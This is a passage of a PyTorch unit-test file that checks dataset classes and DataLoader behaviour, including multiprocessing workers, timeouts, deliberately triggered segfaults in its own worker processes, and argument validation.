def __len__(self):
return self.n
class CountingIterableDataset(IterableDataset):
def __init__(self, n):
super(CountingIterableDataset, self).__init__()
self.n = n
def __iter__(self):
return iter(range(self.n))
def __len__(self):
return self.n
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestTensorDataset(TestCase):
def test_len(self):
source = TensorDataset(torch.randn(15, 10, 2, 3, 4, 5), torch.randperm(15))
self.assertEqual(len(source), 15)
def test_getitem(self):
t = torch.randn(15, 10, 2, 3, 4, 5)
l = torch.randn(15, 10)
source = TensorDataset(t, l)
for i in range(15):
self.assertEqual(t[i], source[i][0])
self.assertEqual(l[i], source[i][1])
def test_getitem_1d(self):
t = torch.randn(15)
l = torch.randn(15)
source = TensorDataset(t, l)
for i in range(15):
self.assertEqual(t[i], source[i][0])
self.assertEqual(l[i], source[i][1])
def test_single_tensor(self):
t = torch.randn(5, 10)
source = TensorDataset(t)
self.assertEqual(len(source), 5)
for i in range(5):
self.assertEqual(t[i], source[i][0])
def test_many_tensors(self):
t0 = torch.randn(5, 10, 2, 3, 4, 5)
t1 = torch.randn(5, 10)
t2 = torch.randn(5, 10, 2, 5)
t3 = torch.randn(5, 10, 3, 7)
source = TensorDataset(t0, t1, t2, t3)
self.assertEqual(len(source), 5)
for i in range(5):
self.assertEqual(t0[i], source[i][0])
self.assertEqual(t1[i], source[i][1])
self.assertEqual(t2[i], source[i][2])
self.assertEqual(t3[i], source[i][3])
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
class TestConcatDataset(TestCase):
def test_concat_two_singletons(self):
result = ConcatDataset([[0], [1]])
self.assertEqual(2, len(result))
self.assertEqual(0, result[0])
self.assertEqual(1, result[1])
def test_concat_two_non_singletons(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
self.assertEqual(10, len(result))
self.assertEqual(0, result[0])
self.assertEqual(5, result[5])
def test_concat_two_non_singletons_with_empty(self):
# Adding an empty dataset somewhere is correctly handled
result = ConcatDataset([[0, 1, 2, 3, 4],
[],
[5, 6, 7, 8, 9]])
self.assertEqual(10, len(result))
self.assertEqual(0, result[0])
self.assertEqual(5, result[5])
def test_concat_raises_index_error(self):
result = ConcatDataset([[0, 1, 2, 3, 4],
[5, 6, 7, 8, 9]])
with self.assertRaises(IndexError):
# this one goes to 11
result[11]
def test_add_dataset(self):
d1 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
d2 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
d3 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
result = d1 + d2 + d3
self.assertEqual(21, len(result))
self.assertEqual(0, (d1[0][0] - result[0][0]).abs().sum())
self.assertEqual(0, (d2[0][0] - result[7][0]).abs().sum())
self.assertEqual(0, (d3[0][0] - result[14][0]).abs().sum())
def test_iterable_dataset_err(self):
d1 = TensorDataset(torch.rand(7, 3, 28, 28), torch.rand(7))
it1 = CountingIterableDataset(5)
it2 = CountingIterableDataset(10)
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([d1, it2, it1])
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([it2])
with self.assertRaisesRegex(AssertionError, "does not support IterableDataset"):
ConcatDataset([it1, d1])
# Takes a dummy argument so this can also be used as a `worker_init_fn`.
def set_faulthander_if_available(_=None):
faulthandler.enable(sys.__stderr__)
if not IS_WINDOWS:
# windows does not have faulthandler.register
# chain=False prevents the default behavior of killing the process
faulthandler.register(signal.SIGUSR1, file=sys.__stderr__, chain=False)
set_faulthander_if_available()
# Process `pid` must have called `set_faulthander_if_available`
def print_traces_of_all_threads(pid):
if not IS_WINDOWS:
# use the custom signal if available
os.kill(pid, signal.SIGUSR1)
else:
# otherwise we can still use the handler given by faulthandler.enable()
# at the cost of killing the process.
os.kill(pid, signal.SIGSEGV)
# wait in parent process to give subprocess some time to print
time.sleep(5)
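# A minimal sketch (illustrative only, never invoked by the tests) of what the
# two helpers above provide: the child registers a SIGUSR1 handler through
# faulthandler, and the parent can then ask it to dump the stacks of all of its
# threads without killing it. This assumes a POSIX platform where SIGUSR1
# exists; with the spawn start method the child target must be a module-level
# function, as it is here.
def _sleepy_child_for_trace_demo(started_evt):
    set_faulthander_if_available()
    started_evt.set()
    time.sleep(30)  # give the parent time to request a traceback dump
def _demo_dump_child_traces():
    evt = mp.Event()
    child = mp.Process(target=_sleepy_child_for_trace_demo, args=(evt,))
    child.start()
    evt.wait()
    print_traces_of_all_threads(child.pid)  # the child writes its stacks to stderr
    child.terminate()
    child.join()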
# The following `ErrorTrackingProcess` stores the first encountered exception in
# its `.exception` attribute.
# Inspired by https://stackoverflow.com/a/33599967
class ErrorTrackingProcess(mp.Process):
# Why no *args?
# py2 doesn't support def fn(x, *args, key=val, **kwargs)
    # Setting disable_stderr=False may generate a lot of unrelated error output,
    # but it can be helpful for debugging.
def __init__(self, disable_stderr=True, **kwargs):
super(ErrorTrackingProcess, self).__init__(**kwargs)
self._pconn, self._cconn = mp.Pipe()
self._exception = None
self.disable_stderr = disable_stderr
def run(self):
set_faulthander_if_available()
if self.disable_stderr:
# Disable polluting stderr with errors that are supposed to happen.
with open(os.devnull, 'w') as devnull:
os.dup2(devnull.fileno(), sys.stderr.fileno())
try:
super(ErrorTrackingProcess, self).run()
self._cconn.send(None)
except Exception:
self._cconn.send(ExceptionWrapper(sys.exc_info()))
raise
def print_traces_of_all_threads(self):
assert self.is_alive(), "can only use print_traces_of_all_threads if the process is alive"
assert not self.disable_stderr, "do not disable stderr if you use print_traces_of_all_threads"
# On platforms without `SIGUSR1`, `set_faulthander_if_available` sets
# `faulthandler.enable()`, and `print_traces_of_all_threads` may kill
# the process. So let's poll the exception first
_ = self.exception
print_traces_of_all_threads(self.pid)
@property
def exception(self):
if self._pconn.poll():
self._exception = self._pconn.recv()
if self._exception is None:
return None
else:
return self._exception.exc_type(self._exception.exc_msg)
    # ESRCH means that os.kill could not find a live process with the given pid
def send_signal(self, signum, ignore_ESRCH=False):
try:
os.kill(self.pid, signum)
except OSError as e:
if not ignore_ESRCH or e.errno != errno.ESRCH:
raise
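# A brief usage sketch (illustrative only, never invoked by the tests) of how
# ErrorTrackingProcess surfaces a child failure in the parent: the child sends
# an ExceptionWrapper over the pipe, and polling `.exception` rebuilds it as an
# instance of the original exception type whose message contains the child's
# traceback text.
def _failing_target_for_demo():
    raise ValueError('boom')
def _demo_error_tracking_process():
    p = ErrorTrackingProcess(target=_failing_target_for_demo)
    p.start()
    p.join(JOIN_TIMEOUT)
    assert isinstance(p.exception, ValueError)
    assert 'boom' in str(p.exception)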
class ErrorDataset(Dataset):
def __init__(self, size):
self.size = size
def __len__(self):
return self.size
class SegfaultDataset(Dataset):
def __init__(self, size):
self.size = size
def __getitem__(self, idx):
return ctypes.string_at(0)
def __len__(self):
return self.size
class SleepDataset(Dataset):
def __init__(self, size, sleep_sec):
self.size = size
self.sleep_sec = sleep_sec
self.sleeped = False
def __getitem__(self, idx):
if not self.sleeped:
time.sleep(self.sleep_sec)
self.sleeped = True
return idx
def __len__(self):
return self.size
class SeedDataset(Dataset):
def __init__(self, size):
self.size = size
def __getitem__(self, idx):
return torch.initial_seed()
def __len__(self):
return self.size
class WorkerSpecificIterableDataset(IterableDataset):
def __init__(self, sizes_for_all_workers):
self.sizes_for_all_workers = sizes_for_all_workers
def __iter__(self):
worker_info = torch.utils.data.get_worker_info()
assert worker_info is not None
return iter(range(self.sizes_for_all_workers[worker_info.id]))
def __len__(self):
return sum(self.sizes_for_all_workers)
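# A related sketch (hypothetical class, not used by any test here): the
# canonical way to shard a single IterableDataset across workers is to slice
# the index range inside `__iter__` based on `get_worker_info()`, so that
# num_workers > 0 does not yield duplicated samples.
class ShardedCountingIterableDataset(IterableDataset):
    def __init__(self, n):
        super(ShardedCountingIterableDataset, self).__init__()
        self.n = n
    def __iter__(self):
        info = torch.utils.data.get_worker_info()
        if info is None:
            # single-process loading: yield everything
            return iter(range(self.n))
        # each worker takes every num_workers-th element, offset by its id
        return iter(range(info.id, self.n, info.num_workers))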
# Inspired by https://stackoverflow.com/a/26703365
# If all workers call `sync_once`, they block until every worker reaches the
# call (i.e., it acts like a barrier): each worker increments a shared counter,
# the last one releases the semaphore, and each worker then acquires and
# immediately re-releases it, passing the single token down the chain.
# This can be used to ensure that each worker processes at least one sample.
class SynchronizedDataset(Dataset):
def __init__(self, size, batch_size, num_workers):
assert size >= num_workers * batch_size
self.count = mp.Value('i', 0, lock=True)
self.barrier = mp.Semaphore(0)
self.num_workers = num_workers
self.size = size
def sync_once(self):
with self.count.get_lock():
self.count.value += 1
if self.count.value == self.num_workers:
self.barrier.release()
self.barrier.acquire()
self.barrier.release()
def __getitem__(self, idx):
raise NotImplementedError
def __len__(self):
return self.size
class EmptyTensorDataset(torch.utils.data.Dataset):
def __init__(self, len):
self.len = len
def __len__(self):
return self.len
def __getitem__(self, any):
return torch.empty(0)
class SynchronizedSeedDataset(SynchronizedDataset):
def __getitem__(self, idx):
self.sync_once()
return torch.initial_seed()
def _test_timeout(persistent_workers):
dataset = SleepDataset(10, 3)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, timeout=1,
persistent_workers=persistent_workers)
_ = next(iter(dataloader))
def _test_timeout_pin_memory(persistent_workers):
dataset = SleepDataset(10, 3)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, timeout=1, pin_memory=True,
persistent_workers=persistent_workers)
_ = next(iter(dataloader))
def _test_large_sampler_indices(persistent_workers):
# See
# test_large_sampler_indices
# https://github.com/pytorch/pytorch/issues/48666
dataloader = torch.utils.data.DataLoader(
EmptyTensorDataset(10000000),
batch_size=40960,
persistent_workers=persistent_workers,
num_workers=1)
it = iter(dataloader)
for x in it:
assert x.numel() == 0
raise RuntimeError('My Error')
def disable_stderr(worker_id):
r"""
Avoids printing "ERROR: Unexpected segmentation fault encountered in worker."
from workers. Since worker signal handler prints with low-level write(),
this has to be done on OS level via dup.
This is used as worker_init_fn for test_segfault.
"""
sys.stderr.flush() # flush library buffers that dup2 knows nothing about
# Can't use a with-block because otherwise the fd will be closed when this
# function ends.
with open(os.devnull, 'w') as devnull:
os.dup2(devnull.fileno(), sys.stderr.fileno())
def _test_segfault():
dataset = SegfaultDataset(10)
dataloader = DataLoader(dataset, batch_size=2, num_workers=2, worker_init_fn=disable_stderr)
_ = next(iter(dataloader))
def _test_no_segfault():
dataset = [1, 2, 3]
num_threads = torch.get_num_threads()
if num_threads < 4:
torch.set_num_threads(4)
else:
torch.set_num_threads(num_threads)
mp_ctx = torch.multiprocessing.get_context(method='fork')
dataloader = DataLoader(dataset, num_workers=1, worker_init_fn=disable_stderr,
multiprocessing_context=mp_ctx)
_ = next(iter(dataloader))
class TestProperExitDataset(Dataset):
def __init__(self, size, error_event):
self.size = size
self.error_event = error_event
def __len__(self):
return self.size
def __getitem__(self, idx):
worker_info = torch.utils.data.get_worker_info()
if self.error_event is not None and self.error_event.is_set() and \
worker_info.id == worker_info.num_workers - 1:
# only error in the last worker
raise RuntimeError('Worker error')
return torch.tensor([idx])
class TestProperExitIterableDataset(IterableDataset):
def __init__(self, size, error_event):
self.error_event = error_event
self.size = size
self.remaining = size
def __len__(self):
return self.size
def __iter__(self):
return self
def __next__(self):
worker_info = torch.utils.data.get_worker_info()
if self.error_event is not None and self.error_event.is_set() and \
worker_info.id == worker_info.num_workers - 1:
# only error in the last worker
raise RuntimeError('Worker error')
self.remaining -= 1
if self.remaining < 0:
raise StopIteration
return torch.tensor(-1000)
next = __next__ # py2 compatibility
# See TestDataLoader.test_proper_exit for usage
def _test_proper_exit(is_iterable_dataset, use_workers, pin_memory, exit_method,
hold_iter_reference, loader_setup_event, tester_setup_event,
persistent_workers):
num_workers = 2 if use_workers else 0
if exit_method == 'worker_error' or exit_method == 'worker_kill':
assert use_workers is True
if exit_method == 'worker_error':
worker_error_event = mp.Event()
else:
worker_error_event = None
if is_iterable_dataset:
ds = TestProperExitIterableDataset(7, worker_error_event)
else:
ds = TestProperExitDataset(12, worker_error_event)
loader = DataLoader(ds, batch_size=1, shuffle=False,
num_workers=num_workers, pin_memory=pin_memory,
worker_init_fn=set_faulthander_if_available,
persistent_workers=persistent_workers)
error_it = 2
if use_workers:
# 2 is the magical per-worker prefetch number...
# FIXME: change this after the number becomes configurable.
if is_iterable_dataset:
assert len(ds) * num_workers > (error_it + 2 + 1)
else:
assert len(loader) > (error_it + 2 + 1) * num_workers
else:
if is_iterable_dataset:
assert len(ds) > error_it + 1
else:
assert len(loader) > error_it + 1
it = iter(loader)
if use_workers:
workers = it._workers
def kill_pid(pid):
psutil_p = psutil.Process(pid)
psutil_p.kill()
psutil_p.wait(JOIN_TIMEOUT)
assert not psutil_p.is_running()
for i, _ in enumerate(it):
if i == 0:
if not hold_iter_reference:
del it
del loader
loader_setup_event.set()
tester_setup_event.wait()
# ensure that the workers are still alive
if use_workers:
for w in workers:
assert w.is_alive()
if worker_error_event is not None:
worker_error_event.set()
if i == error_it:
if exit_method == 'loader_error':
raise RuntimeError('Loader error')
elif exit_method == 'loader_kill':
kill_pid(os.getpid())
elif exit_method == 'worker_kill':
kill_pid(workers[-1].pid) # kill last worker
if not hold_iter_reference:
# Tries to trigger the __del__ clean-up rather than the automatic
# exiting of daemonic children. Technically it should be automatically
# triggered, but I don't want to rely on the implementation detail of
# Python gc.
gc.collect()
class TestWorkerInfoDataset(SynchronizedDataset):
def __getitem__(self, idx):
self.sync_once()
return torch.tensor(self.value)
# Should be used as worker_init_fn with TestWorkerInfoDataset.
# See _test_get_worker_info below for usage.
def _test_worker_info_init_fn(worker_id):
worker_info = torch.utils.data.get_worker_info()
assert worker_id == worker_info.id, "worker_init_fn and worker_info should have consistent id"
assert worker_id < worker_info.num_workers, "worker_init_fn and worker_info should have valid id"
assert worker_info.seed == torch.initial_seed(), "worker_init_fn and worker_info should have consistent seed"
dataset = worker_info.dataset
assert isinstance(dataset, TestWorkerInfoDataset), "worker_info should have correct dataset copy"
assert not hasattr(dataset, 'value'), "worker_info should have correct dataset copy"
# test that WorkerInfo attributes are read-only
try:
worker_info.id = 3999
except RuntimeError as e:
assert str(e) == "Cannot assign attributes to WorkerInfo objects"
try:
worker_info.a = 3
except RuntimeError as e:
assert str(e) == "Cannot assign attributes to WorkerInfo objects"
for k in ['id', 'num_workers', 'seed', 'dataset']:
assert "{}=".format(k) in repr(worker_info)
dataset.value = [worker_id, os.getpid()]
def _test_get_worker_info():
# get_worker_info returns None in main proc
assert torch.utils.data.get_worker_info() is None
num_workers = 2
batch_size = 2
dataset = TestWorkerInfoDataset(6, batch_size, num_workers)
dataloader = DataLoader(dataset, batch_size=batch_size,
num_workers=num_workers,
worker_init_fn=_test_worker_info_init_fn)
it = iter(dataloader)
data = []
for d in it:
data.append(d)
worker_pids = [w.pid for w in it._workers]
data = torch.cat(data, 0)
for d in data:
# each `d` is a [worker_id, worker_pid] pair, which is set in
# _test_worker_info_init_fn
assert d[1] == worker_pids[d[0]]
# get_worker_info returns None in main proc after data loading
assert torch.utils.data.get_worker_info() is None
# main proc dataset was never assigned this attribute
assert not hasattr(dataset, 'value')
try:
_ = dataset[0]
except AttributeError:
return
raise RuntimeError('Expected AttributeError')
# test custom init function
def init_fn(worker_id):
torch.manual_seed(12345)
# used with test_error_in_init
class ErrorIterableDataset(IterableDataset):
def __iter__(self):
raise RuntimeError("Error in __iter__")
# used with test_error_in_init
def error_worker_init_fn(_):
raise RuntimeError("Error in worker_init_fn")
class BulkLoadingDataset(Dataset):
def __init__(self, length):
self.length = length
def __getitem__(self, indices):
assert isinstance(indices, (list, tuple))
return torch.as_tensor(indices)
def __len__(self):
return self.length
class BulkLoadingSampler(torch.utils.data.Sampler):
def __init__(self, dataset, batch_size):
self.dataset = dataset
self.batch_size = batch_size
def __iter__(self):
for x in torch.randperm(len(self.dataset)).split(self.batch_size):
yield x.tolist()
def __len__(self):
return int(math.ceil(len(self.dataset) / float(self.batch_size)))
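# A brief usage sketch (illustrative only; it mirrors test_bulk_loading_nobatch
# below with hypothetical sizes): with batch_size=None auto-batching is
# disabled, so each index list yielded by BulkLoadingSampler is handed to
# BulkLoadingDataset.__getitem__ as a single bulk lookup and the dataset
# returns an already-batched tensor.
def _demo_bulk_loading():
    ds = BulkLoadingDataset(10)
    sampler = BulkLoadingSampler(ds, batch_size=4)
    loader = DataLoader(ds, batch_size=None, sampler=sampler)
    for batch in loader:
        assert isinstance(batch, torch.Tensor)
        assert batch.numel() <= 4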
class CustomList(list):
pass
class CustomDict(dict):
pass
@unittest.skipIf(
TEST_WITH_TSAN,
"Fails with TSAN with the following error: starting new threads after multi-threaded "
"fork is not supported. Dying (set die_after_fork=0 to override)")
@unittest.skipIf(
TEST_WITH_ASAN,
"DataLoader tests hang in ASAN, see: https://github.com/pytorch/pytorch/issues/66223")
class TestDataLoader(TestCase):
def setUp(self):
super(TestDataLoader, self).setUp()
self.data = torch.randn(100, 2, 3, 5)
self.labels = torch.randperm(50).repeat(2)
self.dataset = TensorDataset(self.data, self.labels)
self.persistent_workers = False
def _get_data_loader(self, dataset, **kwargs):
        # `persistent_workers` only makes sense with worker processes, so it is
        # silently dropped when num_workers == 0.
        persistent_workers = kwargs.get('persistent_workers', self.persistent_workers)
        if persistent_workers and kwargs.get('num_workers', 0) == 0:
            persistent_workers = False
        kwargs['persistent_workers'] = persistent_workers
return DataLoader(dataset, **kwargs)
def _test_sequential(self, loader):
batch_size = loader.batch_size
if batch_size is None:
for idx, (sample, target) in enumerate(loader):
self.assertEqual(sample, self.data[idx])
self.assertEqual(target, self.labels[idx])
self.assertEqual(idx, len(self.dataset) - 1)
else:
for i, (sample, target) in enumerate(loader):
idx = i * batch_size
self.assertEqual(sample, self.data[idx:idx + batch_size])
self.assertEqual(target, self.labels[idx:idx + batch_size])
self.assertEqual(i, math.floor((len(self.dataset) - 1) / batch_size))
def _test_shuffle(self, loader):
found_data = {i: 0 for i in range(self.data.size(0))}
found_labels = {i: 0 for i in range(self.labels.size(0))}
batch_size = loader.batch_size
if batch_size is None:
for i, (batch_samples, batch_targets) in enumerate(loader):
sample, target = (batch_samples, batch_targets)
for data_point_idx, data_point in enumerate(self.data):
if data_point.eq(sample).all():
self.assertFalse(found_data[data_point_idx])
found_data[data_point_idx] += 1
break
self.assertEqual(target, self.labels[data_point_idx])
found_labels[data_point_idx] += 1
self.assertEqual(sum(found_data.values()), (i + 1))
self.assertEqual(sum(found_labels.values()), (i + 1))
self.assertEqual(i, (len(self.dataset) - 1))
else:
for i, (batch_samples, batch_targets) in enumerate(loader):
for sample, target in zip(batch_samples, batch_targets):
for data_point_idx, data_point in enumerate(self.data):
if data_point.eq(sample).all():
self.assertFalse(found_data[data_point_idx])
found_data[data_point_idx] += 1
break
self.assertEqual(target, self.labels[data_point_idx])
found_labels[data_point_idx] += 1
self.assertEqual(sum(found_data.values()), (i + 1) * batch_size)
self.assertEqual(sum(found_labels.values()), (i + 1) * batch_size)
self.assertEqual(i, math.floor((len(self.dataset) - 1) / batch_size))
def _test_error(self, loader):
it = iter(loader)
errors = 0
while True:
try:
next(it)
except NotImplementedError:
errors += 1
except StopIteration:
self.assertEqual(errors,
math.ceil(float(len(loader.dataset)) / loader.batch_size))
return
def test_error_in_init(self):
for num_workers in [0, 2]:
loader = self._get_data_loader(ErrorIterableDataset(), num_workers=num_workers)
with self.assertRaisesRegex(RuntimeError, 'Error in __iter__'):
list(iter(loader))
loader = self._get_data_loader(self.dataset, num_workers=2, worker_init_fn=error_worker_init_fn)
with self.assertRaisesRegex(RuntimeError, 'Error in worker_init_fn'):
list(iter(loader))
def test_typing(self):
from typing import List
# Make sure there is no TypeError
class SomeDatasetClass(Dataset[List[torch.Tensor]]):
pass
def _create_dataloader(is_train: bool) -> DataLoader[List[torch.Tensor]]:
pass
@unittest.skipIf(IS_SANDCASTLE, "subprocess doesn't work in FB internal CI")
@unittest.skipIf(IS_WINDOWS, "No 'resource' module on Windows")
def test_fd_limit_exceeded(self):
# See NOTE [ DataLoader on Linux and open files limit ]
import subprocess
subprocess.check_output([sys.executable, '-c', """\
import torch
import resource
from torch.utils.data import DataLoader, IterableDataset
class RandomDataset(IterableDataset):
def __init__(self, len, size):
        super(RandomDataset, self).__init__()
self.len = len
self.size = size
def __iter__(self):
return self
def __next__(self):
if self.len <= 0:
raise StopIteration
self.len -= 1
return torch.randn(self.size)
try:
keep_fds_alive = []
resource.setrlimit(resource.RLIMIT_NOFILE, (100, 100))
for random_t in DataLoader(RandomDataset(200, (2,2)), multiprocessing_context="fork",
num_workers=1):
random_t.max(dim=0)
keep_fds_alive.append(random_t)
except RuntimeError as e:
assert "ulimit -n" in str(e)
assert "set_sharing_strategy" in str(e)
"""])
def test_invalid_assign_after_init(self):
dl = self._get_data_loader(self.dataset)
for attr in ('batch_size', 'sampler', 'batch_sampler', 'drop_last', 'dataset'):
def fn():
setattr(dl, attr, {})
self.assertRaises(ValueError, fn)
def test_sequential_nonbatch(self):
self._test_sequential(self._get_data_loader(self.dataset, batch_size=None))
def test_sequential_batch(self):
self._test_sequential(self._get_data_loader(self.dataset))
self._test_sequential(self._get_data_loader(self.dataset, batch_size=2))
def test_bulk_loading_nobatch(self):
n = 35
bs = 4
ds = BulkLoadingDataset(n)
sampler = BulkLoadingSampler(ds, batch_size=4)
for num_workers in [0, 4]:
dl = self._get_data_loader(ds, num_workers=num_workers, batch_size=None, sampler=sampler, pin_memory=TEST_CUDA)
self.assertFalse(dl._auto_collation)
samples = list(dl)
self.assertEqual(samples[0].is_pinned(), TEST_CUDA)
self.assertEqual(set(torch.cat(samples, 0).tolist()), set(range(n)))
def test_growing_dataset(self):
dataset = [torch.ones(4) for _ in range(4)]
dataloader_seq = self._get_data_loader(dataset, shuffle=False)
dataloader_shuffle = self._get_data_loader(dataset, shuffle=True)
dataset.append(torch.ones(4))
self.assertEqual(len(dataloader_seq), 5)
self.assertEqual(len(dataloader_shuffle), 5)
@unittest.skipIf(not TEST_CUDA, "CUDA unavailable")
def test_sequential_pin_memory(self):
loader = self._get_data_loader(self.dataset, batch_size=2, pin_memory=True)
for input, target in loader:
self.assertTrue(input.is_pinned())
self.assertTrue(target.is_pinned())
def test_multiple_dataloaders(self):
for multiprocessing_context in supported_multiprocessing_contexts:
loader1_it = iter(self._get_data_loader(self.dataset, num_workers=1))
loader2_it = iter(self._get_data_loader(self.dataset, num_workers=2, multiprocessing_context=multiprocessing_context))
next(loader1_it)
next(loader1_it)
next(loader2_it)
next(loader2_it)
next(loader1_it)
next(loader2_it)
def test_segfault(self):
p = ErrorTrackingProcess(target=_test_segfault)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
if IS_WINDOWS:
self.assertIsInstance(p.exception, OSError)
self.assertRegex(str(p.exception), r'access violation reading ')
else:
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader worker \(pid \d+\) is killed by signal: ')
finally:
p.terminate()
# Tests if the child process forked by the DataLoader segfaults due to having more than 3 threads
# in the parent process after at least one set_num_threads invocation in the parent process.
# After forking, set_num_threads(1) in the child process entails handling some inherited data-structures
# of the Caffe2 thread-pool of the parent process, culminating in a segfault.
# Reference: https://github.com/pytorch/pytorch/issues/54752
@unittest.skipIf(IS_WINDOWS, "Needs fork")
def test_no_segfault(self):
p = ErrorTrackingProcess(target=_test_no_segfault)
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
if p.exception:
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader worker \(pid \d+\) is killed by signal: ')
self.fail("Segfault occurred in worker process after fork")
finally:
p.terminate()
def test_timeout(self):
if TEST_CUDA and not NO_MULTIPROCESSING_SPAWN:
# This test runs in a subprocess, which can only initialize CUDA with spawn.
# _test_timeout_pin_memory with pin_memory=True initializes CUDA when the iterator is
# constructed.
targets = (_test_timeout, _test_timeout_pin_memory)
else:
targets = (_test_timeout,)
for target in targets:
p = ErrorTrackingProcess(target=target, args=(self.persistent_workers,))
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'DataLoader timed out after \d+ seconds')
finally:
p.terminate()
def test_large_sampler_indices(self):
        # Test that the data loader exits cleanly when the process errors while
        #   1. holding a reference to the iterator
        #   2. using a sampler that yields elements big enough that the `_index_queues` putters block
#
# More context: https://github.com/pytorch/pytorch/issues/48666
p = ErrorTrackingProcess(target=_test_large_sampler_indices, args=(self.persistent_workers,))
p.start()
p.join(JOIN_TIMEOUT)
try:
self.assertFalse(p.is_alive())
self.assertNotEqual(p.exitcode, 0)
self.assertIsInstance(p.exception, RuntimeError)
self.assertRegex(str(p.exception), r'My Error')
finally:
p.terminate()
def test_invalid_ctor_args_combinations(self):
# general
with self.assertRaisesRegex(ValueError, "num_workers option should be non-negative"):
self._get_data_loader(self.dataset, num_workers=-1)
with self.assertRaisesRegex(ValueError, "timeout option should be non-negative"):
self._get_data_loader(self.dataset, timeout=-1)
# disable auto-batching
with self.assertRaisesRegex(ValueError,
"batch_size=None option disables auto-batching and is mutually exclusive"):
self._get_data_loader(self.dataset, batch_size=None, drop_last=True)
valid_ctx = list(torch.multiprocessing.get_all_start_methods())[-1]
with self.assertRaisesRegex(ValueError, r"multi-process loading \(num_workers > 0\), but got"):
self._get_data_loader(self.dataset, num_workers=0, multiprocessing_context=valid_ctx)
with self.assertRaisesRegex(ValueError, "should specify a valid start method in"):
self._get_data_loader(self.dataset, num_workers=1, multiprocessing_context='bad')
with self.assertRaisesRegex(TypeError, "multiprocessing_context option should be a valid context "):
self._get_data_loader(self.dataset, num_workers=1, multiprocessing_context=object())
# map-style
sampler = torch.utils.data.SequentialSampler(self.dataset)
batch_sampler = torch.utils.data.BatchSampler(sampler, 3, False)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_size=11, sampler=sampler, shuffle=True)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_sampler=batch_sampler, sampler=sampler, shuffle=True)
with self.assertRaisesRegex(ValueError, "sampler option is mutually exclusive with shuffle"):
self._get_data_loader(self.dataset, batch_sampler=batch_sampler, sampler=sampler, shuffle=3)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, batch_size=11, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, shuffle=True, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, drop_last=True, batch_sampler=batch_sampler)
with self.assertRaisesRegex(ValueError, "batch_sampler option is mutually exclusive with"):
self._get_data_loader(self.dataset, drop_last=3, batch_sampler=batch_sampler)
# iterable-style
dataset = CountingIterableDataset(20)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified shuffle"):
self._get_data_loader(dataset, shuffle=True)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified shuffle"):
self._get_data_loader(dataset, shuffle=3)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified sampler"):
self._get_data_loader(dataset, sampler=torch.utils.data.SequentialSampler(dataset))
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified sampler"):
self._get_data_loader(dataset, sampler=3)
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified batch_sampler"):
self._get_data_loader(dataset, batch_sampler=torch.utils.data.BatchSampler(
torch.utils.data.SequentialSampler(dataset), 3, False))
with self.assertRaisesRegex(ValueError, "DataLoader with IterableDataset: expected unspecified batch_sampler"):
self._get_data_loader(dataset, batch_sampler=3)
def test_builtin_collection_conversion(self):
for coll_ty in (list, tuple):
for num_workers in (0, 1):
# map-style dataset
dataset = CountingDataset(20)
# no auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=None, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(range(20)))
# auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=2, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(torch.tensor([i, i + 1]) for i in range(0, 20, 2)))
# iterable-style dataset
dataset = CountingIterableDataset(20)
# no auto-batching
fetched = coll_ty(self._get_data_loader(dataset, batch_size=None, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(range(20)))
# auto-batching
                # this IterableDataset isn't configured per worker, so for the
                # equality test below to be valid, we cannot have more than 1 worker.
assert num_workers in [0, 1], "invalid test"
fetched = coll_ty(self._get_data_loader(dataset, batch_size=2, num_workers=num_workers))
self.assertEqual(fetched, coll_ty(torch.tensor([i, i + 1]) for i in range(0, 20, 2)))
def test_iterable_style_dataset(self):
# [no auto-batching] single process loading
dataset = CountingIterableDataset(20)
dataloader = self._get_data_loader(dataset, batch_size=None)
fetched = list(dataloader)
self.assertEqual(len(fetched), 20)
for i, d in enumerate(fetched):
# non-batched should not convert ints into tensors
self.assertIsInstance(d, int)
self.assertEqual(d, i)
# DataLoader should match len of the iterable-style dataset (if implemented)
self.assertEqual(len(dataloader), len(dataset))
# [no auto-batching] multiprocessing loading
num_workers = 3
